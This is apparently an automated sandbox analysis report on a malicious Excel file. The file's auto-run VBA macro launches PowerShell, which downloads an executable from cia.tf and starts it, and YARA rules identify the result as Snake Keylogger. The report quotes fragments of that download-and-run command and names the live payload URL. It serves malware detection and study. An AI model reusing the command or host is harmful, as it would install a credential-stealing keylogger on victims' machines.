              Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
              Source: tmp667.exe, 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: powershell.exe, 00000002.00000002.377877321.0000000003F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cia.tf
              Source: powershell.exe, 00000002.00000002.384599695.000000001C47E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: powershell.exe, 00000002.00000002.384599695.000000001C47A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
              Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
              Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
              Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
              Source: powershell.exe, 00000002.00000002.377877321.00000000039FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
              Source: tmp667.exe, 00000005.00000002.446119875.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microso
              Source: powershell.exe, 00000002.00000002.377877321.000000000259B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://ocsps.ssl.com0
              Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://ocsps.ssl.com0?
              Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://ocsps.ssl.com0_
              Source: powershell.exe, 00000002.00000002.377877321.0000000002391000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.446711663.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
              Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
              Source: powershell.exe, 00000002.00000002.377877321.0000000003F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf
              Source: powershell.exe, 00000002.00000002.377877321.0000000004152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe
              Source: powershell.exe, 00000002.00000002.377790534.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.384599695.000000001C4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;
              Source: powershell.exe, 00000002.00000002.377772524.00000000003D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;:
              Source: powershell.exe, 00000002.00000002.377761940.00000000002C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;J
              Source: powershell.exe, 00000002.00000002.383828170.000000001A815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;N
              Source: powershell.exe, 00000002.00000002.384433088.000000001B146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;t
              Source: vbaProject.binString found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840ddB.
              Source: powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: powershell.exe, 00000002.00000002.377877321.000000000259B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: tmp667.exe, 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: https://www.ssl.com/repository0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Document contains an embedded VBA macro with suspicious strings
              Source: DGTCkacbSz.xlsxOLE, VBA macro line: Set Hthql = CreateObject("WScript.Shell")
              Source: 79E20000.0.drOLE, VBA macro line: Set Hthql = CreateObject("WScript.Shell")
              Document contains an embedded VBA with hexadecimal encoded strings
              Source: DGTCkacbSz.xlsxStream path 'VBA/ThisWorkbook' : found hex strings
              Source: 79E20000.0.drStream path 'VBA/ThisWorkbook' : found hex strings
              Drops large PE files
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeFile dump: svcost.exe.5.dr 262244634Jump to dropped file
              Powershell drops PE file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\tmp667.exeJump to dropped file
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_001C8A105_2_001C8A10
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_001CCAD85_2_001CCAD8
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_001C8A005_2_001C8A00
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006BF0E85_2_006BF0E8
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006BF0D85_2_006BF0D8
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006B08A85_2_006B08A8
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006B0C565_2_006B0C56
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006D00405_2_006D0040
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006DC8585_2_006DC858
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006D19A35_2_006D19A3
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006DD5005_2_006DD500
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006D68585_2_006D6858
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006D00215_2_006D0021
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006D40F85_2_006D40F8
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006DC0885_2_006DC088
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006D41085_2_006D4108
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006D57C85_2_006D57C8
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006F73185_2_006F7318
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006FCC205_2_006FCC20
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006FED305_2_006FED30
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00D5C0205_2_00D5C020
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00D58D485_2_00D58D48
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00D578E05_2_00D578E0
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00D500405_2_00D50040
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00D5D2195_2_00D5D219
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00D5C3475_2_00D5C347
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00D58D3A5_2_00D58D3A
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_049800405_2_04980040
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_054000405_2_05400040
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_0541E3505_2_0541E350
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_0541DEF85_2_0541DEF8
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00318A108_2_00318A10
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0031CAD88_2_0031CAD8
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00318A008_2_00318A00
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C2D9808_2_00C2D980
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C208988_2_00C20898
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C208A88_2_00C208A8
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C2D9708_2_00C2D970
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C20AFE8_2_00C20AFE
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C274FF8_2_00C274FF
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C20C568_2_00C20C56
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C400408_2_00C40040
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C4C8588_2_00C4C858
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C419A38_2_00C419A3
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C4D5008_2_00C4D500
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C440F88_2_00C440F8
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C4C0888_2_00C4C088
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C4C8488_2_00C4C848
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C468588_2_00C46858
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C4C0788_2_00C4C078
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C441088_2_00C44108
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C4D4F08_2_00C4D4F0
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C457C88_2_00C457C8
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C573188_2_00C57318
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C5CC208_2_00C5CC20
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C5CC1E8_2_00C5CC1E
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C5ED208_2_00C5ED20
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C5ED308_2_00C5ED30
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0432C0208_2_0432C020
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_04328D3A8_2_04328D3A
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_04328D488_2_04328D48
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_043200408_2_04320040
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_043278E08_2_043278E0
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0432D2198_2_0432D219
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0432C3478_2_0432C347
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_04B700408_2_04B70040
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_054000408_2_05400040
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_054000068_2_05400006
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0541E3508_2_0541E350
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0541DEF88_2_0541DEF8
              Source: DGTCkacbSz.xlsxOLE, VBA macro line: Private Sub Workbook_Open()
              Source: 79E20000.0.drOLE, VBA macro line: Private Sub Workbook_Open()
              Source: DGTCkacbSz.xlsxOLE indicator, VBA macros: true
              Source: 79E20000.0.drOLE indicator, VBA macros: true
              Source: 79E20000.0.drStream path 'VBA/__SRP_0' : https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -Out*File $TempFile; St*art-Proce*ss $TempFile;,^WScript.ShellQa1"hExecF
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
